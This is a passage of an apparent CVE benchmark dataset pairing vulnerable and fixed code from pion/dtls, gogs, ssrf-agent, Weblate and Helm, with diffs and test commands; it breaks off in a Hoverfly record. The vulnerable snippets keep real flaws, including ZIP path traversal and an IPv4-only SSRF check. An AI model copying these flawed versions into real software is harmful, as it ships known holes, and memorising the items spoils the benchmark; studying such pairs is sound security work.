err\n\t\t\t}\n\t\t}\n\n\t\tif state.extendedMasterSecret {\n\t\t\tvar sessionHash []byte\n\t\t\tsessionHash, err = cache.sessionHash(state.cipherSuite.HashFunc(), cfg.initialEpoch)\n\t\t\tif err != nil {\n\t\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, err\n\t\t\t}\n\n\t\t\tstate.masterSecret, err = prf.ExtendedMasterSecret(preMasterSecret, sessionHash, state.cipherSuite.HashFunc())\n\t\t\tif err != nil {\n\t\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, err\n\t\t\t}\n\t\t} else {\n\t\t\tstate.masterSecret, err = prf.MasterSecret(preMasterSecret, clientRandom[:], serverRandom[:], state.cipherSuite.HashFunc())\n\t\t\tif err != nil {\n\t\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, err\n\t\t\t}\n\t\t}\n\n\t\tif err := state.cipherSuite.Init(state.masterSecret, clientRandom[:], serverRandom[:], false); err != nil {\n\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, err\n\t\t}\n\t\tcfg.writeKeyLog(keyLogLabelTLS12, clientRandom[:], state.masterSecret)\n\t}\n\n\tif len(state.SessionID) > 0 {\n\t\ts := Session{\n\t\t\tID: state.SessionID,\n\t\t\tSecret: state.masterSecret,\n\t\t}\n\t\tcfg.log.Tracef(\"[handshake] save new session: %x\", s.ID)\n\t\tif err := cfg.sessionStore.Set(state.SessionID, s); err != nil {\n\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, err\n\t\t}\n\t}\n\n\t// Now, encrypted packets can be handled\n\tif err := c.handleQueuedPackets(ctx); err != nil {\n\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, err\n\t}\n\n\tseq, msgs, ok = cache.fullPullMap(seq, state.cipherSuite,\n\t\thandshakeCachePullRule{handshake.TypeFinished, cfg.initialEpoch + 1, true, false},\n\t)\n\tif !ok {\n\t\t// No valid message received. 
Keep reading\n\t\treturn 0, nil, nil\n\t}\n\tstate.handshakeRecvSequence = seq\n\n\tif _, ok = msgs[handshake.TypeFinished].(*handshake.MessageFinished); !ok {\n\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, nil\n\t}\n\n\tif state.cipherSuite.AuthenticationType() == CipherSuiteAuthenticationTypeAnonymous {\n\t\treturn flight6, nil, nil\n\t}\n\n\tswitch cfg.clientAuth {\n\tcase RequireAnyClientCert:\n\t\tif state.PeerCertificates == nil {\n\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.NoCertificate}, errClientCertificateRequired\n\t\t}\n\tcase VerifyClientCertIfGiven:\n\t\tif state.PeerCertificates != nil && !state.peerCertificatesVerified {\n\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.BadCertificate}, errClientCertificateNotVerified\n\t\t}\n\tcase RequireAndVerifyClientCert:\n\t\tif state.PeerCertificates == nil {\n\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.NoCertificate}, errClientCertificateRequired\n\t\t}\n\t\tif !state.peerCertificatesVerified {\n\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.BadCertificate}, errClientCertificateNotVerified\n\t\t}\n\tcase NoClientCert, RequestClientCert:\n\t\treturn flight6, nil, nil\n\t}\n\n\treturn flight6, nil, nil\n}"}], "fix_func": [{"id": "fix_go_87_1", "commit": "d2f7971", "file_path": "flight4handler.go", "start_line": "19", "end_line": "205", "snippet": "func flight4Parse(ctx context.Context, c flightConn, state *State, cache *handshakeCache, cfg *handshakeConfig) (flightVal, *alert.Alert, error) { //nolint:gocognit\n\tseq, msgs, ok := cache.fullPullMap(state.handshakeRecvSequence, state.cipherSuite,\n\t\thandshakeCachePullRule{handshake.TypeCertificate, cfg.initialEpoch, true, true},\n\t\thandshakeCachePullRule{handshake.TypeClientKeyExchange, cfg.initialEpoch, true, false},\n\t\thandshakeCachePullRule{handshake.TypeCertificateVerify, cfg.initialEpoch, true, true},\n\t)\n\tif !ok {\n\t\t// No valid message received. 
Keep reading\n\t\treturn 0, nil, nil\n\t}\n\n\t// Validate type\n\tvar clientKeyExchange *handshake.MessageClientKeyExchange\n\tif clientKeyExchange, ok = msgs[handshake.TypeClientKeyExchange].(*handshake.MessageClientKeyExchange); !ok {\n\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, nil\n\t}\n\n\tif h, hasCert := msgs[handshake.TypeCertificate].(*handshake.MessageCertificate); hasCert {\n\t\tstate.PeerCertificates = h.Certificate\n\t\t// If the client offer its certificate, just disable session resumption.\n\t\t// Otherwise, we have to store the certificate identitfication and expire time.\n\t\t// And we have to check whether this certificate expired, revoked or changed.\n\t\t//\n\t\t// https://curl.se/docs/CVE-2016-5419.html\n\t\tstate.SessionID = nil\n\t}\n\n\tif h, hasCertVerify := msgs[handshake.TypeCertificateVerify].(*handshake.MessageCertificateVerify); hasCertVerify {\n\t\tif state.PeerCertificates == nil {\n\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.NoCertificate}, errCertificateVerifyNoCertificate\n\t\t}\n\n\t\tplainText := cache.pullAndMerge(\n\t\t\thandshakeCachePullRule{handshake.TypeClientHello, cfg.initialEpoch, true, false},\n\t\t\thandshakeCachePullRule{handshake.TypeServerHello, cfg.initialEpoch, false, false},\n\t\t\thandshakeCachePullRule{handshake.TypeCertificate, cfg.initialEpoch, false, false},\n\t\t\thandshakeCachePullRule{handshake.TypeServerKeyExchange, cfg.initialEpoch, false, false},\n\t\t\thandshakeCachePullRule{handshake.TypeCertificateRequest, cfg.initialEpoch, false, false},\n\t\t\thandshakeCachePullRule{handshake.TypeServerHelloDone, cfg.initialEpoch, false, false},\n\t\t\thandshakeCachePullRule{handshake.TypeCertificate, cfg.initialEpoch, true, false},\n\t\t\thandshakeCachePullRule{handshake.TypeClientKeyExchange, cfg.initialEpoch, true, false},\n\t\t)\n\n\t\t// Verify that the pair of hash algorithm and signiture is listed.\n\t\tvar validSignatureScheme bool\n\t\tfor _, ss := range cfg.localSignatureSchemes {\n\t\t\tif ss.Hash == h.HashAlgorithm && ss.Signature == h.SignatureAlgorithm {\n\t\t\t\tvalidSignatureScheme = true\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\tif !validSignatureScheme {\n\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InsufficientSecurity}, errNoAvailableSignatureSchemes\n\t\t}\n\n\t\tif err := verifyCertificateVerify(plainText, h.HashAlgorithm, h.Signature, state.PeerCertificates); err != nil {\n\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.BadCertificate}, err\n\t\t}\n\t\tvar chains [][]*x509.Certificate\n\t\tvar err error\n\t\tvar verified bool\n\t\tif cfg.clientAuth >= VerifyClientCertIfGiven {\n\t\t\tif chains, err = verifyClientCert(state.PeerCertificates, cfg.clientCAs); err != nil {\n\t\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.BadCertificate}, err\n\t\t\t}\n\t\t\tverified = true\n\t\t}\n\t\tif cfg.verifyPeerCertificate != nil {\n\t\t\tif err := cfg.verifyPeerCertificate(state.PeerCertificates, chains); err != nil {\n\t\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.BadCertificate}, err\n\t\t\t}\n\t\t}\n\t\tstate.peerCertificatesVerified = verified\n\t} else if state.PeerCertificates != nil {\n\t\t// A certificate was received, but we haven't seen a CertificateVerify\n\t\t// keep reading until we receieve one\n\t\treturn 0, nil, nil\n\t}\n\n\tif !state.cipherSuite.IsInitialized() {\n\t\tserverRandom := state.localRandom.MarshalFixed()\n\t\tclientRandom := 
state.remoteRandom.MarshalFixed()\n\n\t\tvar err error\n\t\tvar preMasterSecret []byte\n\t\tif state.cipherSuite.AuthenticationType() == CipherSuiteAuthenticationTypePreSharedKey {\n\t\t\tvar psk []byte\n\t\t\tif psk, err = cfg.localPSKCallback(clientKeyExchange.IdentityHint); err != nil {\n\t\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, err\n\t\t\t}\n\t\t\tstate.IdentityHint = clientKeyExchange.IdentityHint\n\t\t\tswitch state.cipherSuite.KeyExchangeAlgorithm() {\n\t\t\tcase CipherSuiteKeyExchangeAlgorithmPsk:\n\t\t\t\tpreMasterSecret = prf.PSKPreMasterSecret(psk)\n\t\t\tcase (CipherSuiteKeyExchangeAlgorithmPsk | CipherSuiteKeyExchangeAlgorithmEcdhe):\n\t\t\t\tif preMasterSecret, err = prf.EcdhePSKPreMasterSecret(psk, clientKeyExchange.PublicKey, state.localKeypair.PrivateKey, state.localKeypair.Curve); err != nil {\n\t\t\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, err\n\t\t\t\t}\n\t\t\tdefault:\n\t\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, errInvalidCipherSuite\n\t\t\t}\n\t\t} else {\n\t\t\tpreMasterSecret, err = prf.PreMasterSecret(clientKeyExchange.PublicKey, state.localKeypair.PrivateKey, state.localKeypair.Curve)\n\t\t\tif err != nil {\n\t\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.IllegalParameter}, err\n\t\t\t}\n\t\t}\n\n\t\tif state.extendedMasterSecret {\n\t\t\tvar sessionHash []byte\n\t\t\tsessionHash, err = cache.sessionHash(state.cipherSuite.HashFunc(), cfg.initialEpoch)\n\t\t\tif err != nil {\n\t\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, err\n\t\t\t}\n\n\t\t\tstate.masterSecret, err = prf.ExtendedMasterSecret(preMasterSecret, sessionHash, state.cipherSuite.HashFunc())\n\t\t\tif err != nil {\n\t\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, err\n\t\t\t}\n\t\t} else {\n\t\t\tstate.masterSecret, err = prf.MasterSecret(preMasterSecret, clientRandom[:], serverRandom[:], state.cipherSuite.HashFunc())\n\t\t\tif err != nil {\n\t\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, err\n\t\t\t}\n\t\t}\n\n\t\tif err := state.cipherSuite.Init(state.masterSecret, clientRandom[:], serverRandom[:], false); err != nil {\n\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, err\n\t\t}\n\t\tcfg.writeKeyLog(keyLogLabelTLS12, clientRandom[:], state.masterSecret)\n\t}\n\n\tif len(state.SessionID) > 0 {\n\t\ts := Session{\n\t\t\tID: state.SessionID,\n\t\t\tSecret: state.masterSecret,\n\t\t}\n\t\tcfg.log.Tracef(\"[handshake] save new session: %x\", s.ID)\n\t\tif err := cfg.sessionStore.Set(state.SessionID, s); err != nil {\n\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, err\n\t\t}\n\t}\n\n\t// Now, encrypted packets can be handled\n\tif err := c.handleQueuedPackets(ctx); err != nil {\n\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, err\n\t}\n\n\tseq, msgs, ok = cache.fullPullMap(seq, state.cipherSuite,\n\t\thandshakeCachePullRule{handshake.TypeFinished, cfg.initialEpoch + 1, true, false},\n\t)\n\tif !ok {\n\t\t// No valid message received. 
Keep reading\n\t\treturn 0, nil, nil\n\t}\n\tstate.handshakeRecvSequence = seq\n\n\tif _, ok = msgs[handshake.TypeFinished].(*handshake.MessageFinished); !ok {\n\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.InternalError}, nil\n\t}\n\n\tif state.cipherSuite.AuthenticationType() == CipherSuiteAuthenticationTypeAnonymous {\n\t\treturn flight6, nil, nil\n\t}\n\n\tswitch cfg.clientAuth {\n\tcase RequireAnyClientCert:\n\t\tif state.PeerCertificates == nil {\n\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.NoCertificate}, errClientCertificateRequired\n\t\t}\n\tcase VerifyClientCertIfGiven:\n\t\tif state.PeerCertificates != nil && !state.peerCertificatesVerified {\n\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.BadCertificate}, errClientCertificateNotVerified\n\t\t}\n\tcase RequireAndVerifyClientCert:\n\t\tif state.PeerCertificates == nil {\n\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.NoCertificate}, errClientCertificateRequired\n\t\t}\n\t\tif !state.peerCertificatesVerified {\n\t\t\treturn 0, &alert.Alert{Level: alert.Fatal, Description: alert.BadCertificate}, errClientCertificateNotVerified\n\t\t}\n\tcase NoClientCert, RequestClientCert:\n\t\treturn flight6, nil, nil\n\t}\n\n\treturn flight6, nil, nil\n}"}], "vul_patch": "--- a/flight4handler.go\n+++ b/flight4handler.go\n@@ -71,6 +71,10 @@\n \t\t\t}\n \t\t}\n \t\tstate.peerCertificatesVerified = verified\n+\t} else if state.PeerCertificates != nil {\n+\t\t// A certificate was received, but we haven't seen a CertificateVerify\n+\t\t// keep reading until we receieve one\n+\t\treturn 0, nil, nil\n \t}\n \n \tif !state.cipherSuite.IsInitialized() {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-1986", "cve_description": "OS Command Injection in GitHub repository gogs/gogs prior to 0.12.9.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/gogs/gogs", "patch_url": ["https://github.com/gogs/gogs/commit/38aff73251cc46ced96dd608dab6190415032a82"], "programing_language": "Go", "vul_func": [{"id": "vul_go_6_1", "commit": "6982749", "file_path": "internal/db/repo_editor.go", "start_line": 468, "end_line": 474, "snippet": "func isRepositoryGitPath(path string) bool {\n\treturn strings.HasSuffix(path, \".git\") ||\n\t\tstrings.Contains(path, \".git\"+string(os.PathSeparator)) ||\n\t\t// Windows treats \".git.\" the same as 
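A language-neutral restatement (sketched in Python, though the pion/dtls code above is Go) of the guard the patch adds: a received client Certificate counts for nothing until a CertificateVerify proves possession of the matching private key. Field names here are hypothetical.

def client_auth_step(peer_certificates, certificate_verify_seen):
    if peer_certificates and not certificate_verify_seen:
        # Patched behaviour: keep reading handshake messages; the unproven
        # certificate must not be treated as authenticated yet.
        return "keep_reading"
    return "proceed"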
\".git\"\n\t\tstrings.HasSuffix(path, \".git.\") ||\n\t\tstrings.Contains(path, \".git.\"+string(os.PathSeparator))\n}"}], "fix_func": [{"id": "fix_go_6_1", "commit": "38aff73", "file_path": "internal/db/repo_editor.go", "start_line": 468, "end_line": 476, "snippet": "func isRepositoryGitPath(path string) bool {\n\treturn strings.HasSuffix(path, \".git\") ||\n\t\tstrings.Contains(path, \".git/\") ||\n\t\tstrings.Contains(path, `.git\\`) ||\n\t\t// Windows treats \".git.\" the same as \".git\"\n\t\tstrings.HasSuffix(path, \".git.\") ||\n\t\tstrings.Contains(path, \".git./\") ||\n\t\tstrings.Contains(path, `.git.\\`)\n}"}], "vul_patch": "--- a/internal/db/repo_editor.go\n+++ b/internal/db/repo_editor.go\n@@ -1,7 +1,9 @@\n func isRepositoryGitPath(path string) bool {\n \treturn strings.HasSuffix(path, \".git\") ||\n-\t\tstrings.Contains(path, \".git\"+string(os.PathSeparator)) ||\n+\t\tstrings.Contains(path, \".git/\") ||\n+\t\tstrings.Contains(path, `.git\\`) ||\n \t\t// Windows treats \".git.\" the same as \".git\"\n \t\tstrings.HasSuffix(path, \".git.\") ||\n-\t\tstrings.Contains(path, \".git.\"+string(os.PathSeparator))\n+\t\tstrings.Contains(path, \".git./\") ||\n+\t\tstrings.Contains(path, `.git.\\`)\n }\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-1986:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/gogs\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^Test_isRepositoryGitPath$ gogs.io/gogs/internal/db\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-1986:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/gogs\ngit apply --whitespace=nowarn /workspace/fix.patch\ngo test -timeout 30s -run '^(Test_isRepositoryGitPath)$' gogs.io/gogs/internal/db\n"} {"cve_id": "CVE-2021-23718", "cve_description": "The package ssrf-agent before 1.0.5 are vulnerable to Server-side Request Forgery (SSRF) via the defaultIpChecker function. 
It fails to properly validate if the IP requested is private.", "cwe_info": {"CWE-918": {"name": "Server-Side Request Forgery (SSRF)", "description": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."}}, "repo": "https://github.com/welefen/ssrf-agent", "patch_url": ["https://github.com/welefen/ssrf-agent/commit/9607175acd0647d821bae4e8fcc3b712aca3fd2d#diff-e727e4bdf3657fd1d798edcd6b099d6e092f8573cba266154583a746bba0f346"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_257_1", "commit": "cec2b85", "file_path": "index.js", "start_line": "3", "end_line": "3", "snippet": "const { isPrivate, isV4Format } = require('ip');"}, {"id": "vul_js_257_2", "commit": "cec2b85", "file_path": "index.js", "start_line": "13", "end_line": "16", "snippet": "const defaultIpChecker = ip => {\n if (isV4Format(ip)) {\n return !isPrivate(ip);\n }"}], "fix_func": [{"id": "fix_js_257_1", "commit": "9607175", "file_path": "index.js", "start_line": "3", "end_line": "3", "snippet": "const { isPrivate, isV4Format, isV6Format } = require('ip');"}, {"id": "fix_js_257_2", "commit": "9607175", "file_path": "index.js", "start_line": "13", "end_line": "16", "snippet": "const defaultIpChecker = ip => {\n if (isV4Format(ip) || isV6Format(ip)) {\n return !isPrivate(ip);\n }"}], "vul_patch": "--- a/index.js\n+++ b/index.js\n@@ -1 +1 @@\n-const { isPrivate, isV4Format } = require('ip');\n+const { isPrivate, isV4Format, isV6Format } = require('ip');\n\n--- a/index.js\n+++ b/index.js\n@@ -1,4 +1,4 @@\n const defaultIpChecker = ip => {\n- if (isV4Format(ip)) {\n+ if (isV4Format(ip) || isV6Format(ip)) {\n return !isPrivate(ip);\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-39303", "cve_description": "Weblate is a web based localization tool. Prior to version 5.6.2, Weblate didn't correctly validate filenames when restoring project backup. It may be possible to gain unauthorized access to files on the server using a crafted ZIP file. This issue has been addressed in Weblate 5.6.2. 
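Illustrative alternative using Python's ipaddress module (a substitution for illustration, not the JS 'ip' package ssrf-agent actually uses): classify the resolved address for both IPv4 and IPv6, which is exactly the gap the patch closes. Note that handling of IPv4-mapped IPv6 addresses varies across Python versions.

import ipaddress

def ip_is_safe(ip: str) -> bool:
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    # is_global is False for private, loopback, link-local and reserved ranges
    return addr.is_global and not addr.is_multicast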
As a workaround, do not allow untrusted users to create projects.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/WeblateOrg/weblate", "patch_url": ["https://github.com/WeblateOrg/weblate/commit/b6a7eace155fa0feaf01b4ac36165a9c5e63bfdd"], "programing_language": "Python", "vul_func": [{"id": "vul_py_348_1", "commit": "0137a35d95c2731b554737bbb1476b90d8118095", "file_path": "weblate/trans/backups.py", "start_line": 564, "end_line": 625, "snippet": " def restore(self, project_name: str, project_slug: str, user, billing=None):\n if not isinstance(self.filename, str):\n raise TypeError(\"Need a filename string.\")\n with ZipFile(self.filename, \"r\") as zipfile:\n self.load_data(zipfile)\n\n # Create project\n kwargs = self.data[\"project\"].copy()\n kwargs[\"name\"] = project_name\n kwargs[\"slug\"] = project_slug\n self.project = project = Project.objects.create(**kwargs)\n\n # Handle billing and ACL (creating user needs access)\n self.project.post_create(user, billing)\n\n # Create labels\n labels = Label.objects.bulk_create(\n Label(project=project, **entry) for entry in self.data[\"labels\"]\n )\n self.labels_map = {label.name: label for label in labels}\n\n # Import translation memory\n memory = self.load_memory(zipfile)\n Memory.objects.bulk_create(\n [\n Memory(\n project=project,\n origin=entry[\"origin\"],\n source=entry[\"source\"],\n target=entry[\"target\"],\n source_language=self.import_language(entry[\"source_language\"]),\n target_language=self.import_language(entry[\"target_language\"]),\n )\n for entry in memory\n ]\n )\n\n # Extract VCS\n for name in zipfile.namelist():\n if name.startswith(self.VCS_PREFIX):\n targetpath = os.path.join(\n project.full_path, name[self.VCS_PREFIX_LEN :]\n )\n upperdirs = os.path.dirname(targetpath)\n if upperdirs and not os.path.exists(upperdirs):\n os.makedirs(upperdirs)\n with zipfile.open(name) as source, open(targetpath, \"wb\") as target:\n copyfileobj(source, target)\n\n # Create components\n self.load_components(zipfile, self.restore_component)\n\n # Fixup linked components\n old_slug = f\"/{self.data['project']['slug']}/\"\n new_slug = f\"/{project.slug}/\"\n for component in self.project.component_set.filter(\n repo__istartswith=\"weblate:\"\n ):\n component.repo = component.repo.replace(old_slug, new_slug)\n component.save()\n\n return self.project"}], "fix_func": [{"id": "fix_py_348_1", "commit": "b6a7eace155fa0feaf01b4ac36165a9c5e63bfdd", "file_path": "weblate/trans/backups.py", "start_line": 564, "end_line": 627, "snippet": " def restore(self, project_name: str, project_slug: str, user, billing=None):\n if not isinstance(self.filename, str):\n raise TypeError(\"Need a filename string.\")\n with ZipFile(self.filename, \"r\") as zipfile:\n self.load_data(zipfile)\n\n # Create project\n kwargs = self.data[\"project\"].copy()\n kwargs[\"name\"] = project_name\n kwargs[\"slug\"] = project_slug\n 
self.project = project = Project.objects.create(**kwargs)\n\n # Handle billing and ACL (creating user needs access)\n self.project.post_create(user, billing)\n\n # Create labels\n labels = Label.objects.bulk_create(\n Label(project=project, **entry) for entry in self.data[\"labels\"]\n )\n self.labels_map = {label.name: label for label in labels}\n\n # Import translation memory\n memory = self.load_memory(zipfile)\n Memory.objects.bulk_create(\n [\n Memory(\n project=project,\n origin=entry[\"origin\"],\n source=entry[\"source\"],\n target=entry[\"target\"],\n source_language=self.import_language(entry[\"source_language\"]),\n target_language=self.import_language(entry[\"target_language\"]),\n )\n for entry in memory\n ]\n )\n\n # Extract VCS\n for name in zipfile.namelist():\n if name.startswith(self.VCS_PREFIX):\n path = name[self.VCS_PREFIX_LEN :]\n # Skip potentially dangerous paths\n if path != os.path.normpath(path):\n continue\n targetpath = os.path.join(project.full_path, path)\n upperdirs = os.path.dirname(targetpath)\n if upperdirs and not os.path.exists(upperdirs):\n os.makedirs(upperdirs)\n with zipfile.open(name) as source, open(targetpath, \"wb\") as target:\n copyfileobj(source, target)\n\n # Create components\n self.load_components(zipfile, self.restore_component)\n\n # Fixup linked components\n old_slug = f\"/{self.data['project']['slug']}/\"\n new_slug = f\"/{project.slug}/\"\n for component in self.project.component_set.filter(\n repo__istartswith=\"weblate:\"\n ):\n component.repo = component.repo.replace(old_slug, new_slug)\n component.save()\n\n return self.project"}], "vul_patch": "--- a/weblate/trans/backups.py\n+++ b/weblate/trans/backups.py\n@@ -38,9 +38,11 @@\n # Extract VCS\n for name in zipfile.namelist():\n if name.startswith(self.VCS_PREFIX):\n- targetpath = os.path.join(\n- project.full_path, name[self.VCS_PREFIX_LEN :]\n- )\n+ path = name[self.VCS_PREFIX_LEN :]\n+ # Skip potentially dangerous paths\n+ if path != os.path.normpath(path):\n+ continue\n+ targetpath = os.path.join(project.full_path, path)\n upperdirs = os.path.dirname(targetpath)\n if upperdirs and not os.path.exists(upperdirs):\n os.makedirs(upperdirs)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-15184", "cve_description": "In Helm before versions 2.16.11 and 3.3.2 there is a bug in which the `alias` field on a `Chart.yaml` is not properly sanitized. This could lead to the injection of unwanted information into a chart. This issue has been patched in Helm 3.3.2 and 2.16.11. 
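Illustrative sketch of the member-name check in the Weblate patch above. The patch itself only compares the name against os.path.normpath(); the absolute-path and leading-'..' rejections added here are a defensive extra, flagged as such because normpath('../x') equals '../x' and would pass the equality test alone.

import os

def is_safe_member(name: str) -> bool:
    return (
        name == os.path.normpath(name)
        and not os.path.isabs(name)
        and not (name == ".." or name.startswith("../"))
    )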
A possible workaround is to manually review the `dependencies` field of any untrusted chart, verifying that the `alias` field is either not used, or (if used) does not contain newlines or path characters.", "cwe_info": {"CWE-74": {"name": "Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')", "description": "The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component."}}, "repo": "https://github.com/helm/helm", "patch_url": ["https://github.com/helm/helm/commit/e7c281564d8306e1dcf8023d97f972449ad74850"], "programing_language": "Go", "vul_func": [{"id": "vul_go_131_1", "commit": "860b1a9", "file_path": "pkg/chart/metadata.go", "start_line": 68, "end_line": 86, "snippet": "func (md *Metadata) Validate() error {\n\tif md == nil {\n\t\treturn ValidationError(\"chart.metadata is required\")\n\t}\n\tif md.APIVersion == \"\" {\n\t\treturn ValidationError(\"chart.metadata.apiVersion is required\")\n\t}\n\tif md.Name == \"\" {\n\t\treturn ValidationError(\"chart.metadata.name is required\")\n\t}\n\tif md.Version == \"\" {\n\t\treturn ValidationError(\"chart.metadata.version is required\")\n\t}\n\tif !isValidChartType(md.Type) {\n\t\treturn ValidationError(\"chart.metadata.type must be application or library\")\n\t}\n\t// TODO validate valid semver here?\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_131_1", "commit": "e7c2815", "file_path": "pkg/chart/metadata.go", "start_line": 68, "end_line": 95, "snippet": "func (md *Metadata) Validate() error {\n\tif md == nil {\n\t\treturn ValidationError(\"chart.metadata is required\")\n\t}\n\tif md.APIVersion == \"\" {\n\t\treturn ValidationError(\"chart.metadata.apiVersion is required\")\n\t}\n\tif md.Name == \"\" {\n\t\treturn ValidationError(\"chart.metadata.name is required\")\n\t}\n\tif md.Version == \"\" {\n\t\treturn ValidationError(\"chart.metadata.version is required\")\n\t}\n\tif !isValidChartType(md.Type) {\n\t\treturn ValidationError(\"chart.metadata.type must be application or library\")\n\t}\n\n\t// Aliases need to be validated here to make sure that the alias name does\n\t// not contain any illegal characters.\n\tfor _, dependency := range md.Dependencies {\n\t\tif err := validateDependency(dependency); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\t// TODO validate valid semver here?\n\treturn nil\n}"}, {"id": "fix_go_131_2", "commit": "e7c2815", "file_path": "pkg/chart/chart.go", "start_line": 31, "end_line": 31, "snippet": "var aliasNameFormat = regexp.MustCompile(\"^[a-zA-Z0-9_-]+$\")"}, {"id": "fix_go_131_3", "commit": "e7c2815", "file_path": "pkg/chart/errors.go", "start_line": 28, "end_line": 30, "snippet": "func ValidationErrorf(msg string, args ...interface{}) ValidationError {\n\treturn ValidationError(fmt.Sprintf(msg, args...))\n}"}, {"id": "fix_go_131_4", "commit": "e7c2815", "file_path": "pkg/chart/metadata.go", "start_line": 108, "end_line": 113, "snippet": "func validateDependency(dep *Dependency) error {\n\tif len(dep.Alias) > 0 && !aliasNameFormat.MatchString(dep.Alias) {\n\t\treturn ValidationErrorf(\"dependency %q has disallowed characters in the alias\", dep.Name)\n\t}\n\treturn nil\n}"}], "vul_patch": "--- a/pkg/chart/metadata.go\n+++ b/pkg/chart/metadata.go\n@@ -14,6 +14,15 @@\n \tif !isValidChartType(md.Type) {\n \t\treturn 
ValidationError(\"chart.metadata.type must be application or library\")\n \t}\n+\n+\t// Aliases need to be validated here to make sure that the alias name does\n+\t// not contain any illegal characters.\n+\tfor _, dependency := range md.Dependencies {\n+\t\tif err := validateDependency(dependency); err != nil {\n+\t\t\treturn err\n+\t\t}\n+\t}\n+\n \t// TODO validate valid semver here?\n \treturn nil\n }\n\n--- /dev/null\n+++ b/pkg/chart/metadata.go\n@@ -0,0 +1 @@\n+var aliasNameFormat = regexp.MustCompile(\"^[a-zA-Z0-9_-]+$\")\n\n--- /dev/null\n+++ b/pkg/chart/metadata.go\n@@ -0,0 +1,3 @@\n+func ValidationErrorf(msg string, args ...interface{}) ValidationError {\n+\treturn ValidationError(fmt.Sprintf(msg, args...))\n+}\n\n--- /dev/null\n+++ b/pkg/chart/metadata.go\n@@ -0,0 +1,6 @@\n+func validateDependency(dep *Dependency) error {\n+\tif len(dep.Alias) > 0 && !aliasNameFormat.MatchString(dep.Alias) {\n+\t\treturn ValidationErrorf(\"dependency %q has disallowed characters in the alias\", dep.Name)\n+\t}\n+\treturn nil\n+}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-45388", "cve_description": "Hoverfly is a lightweight service virtualization/ API simulation / API mocking tool for developers and testers. The `/api/v2/simulation` POST handler allows users to create new simulation views from the contents of a user-specified file. This feature can be abused by an attacker to read 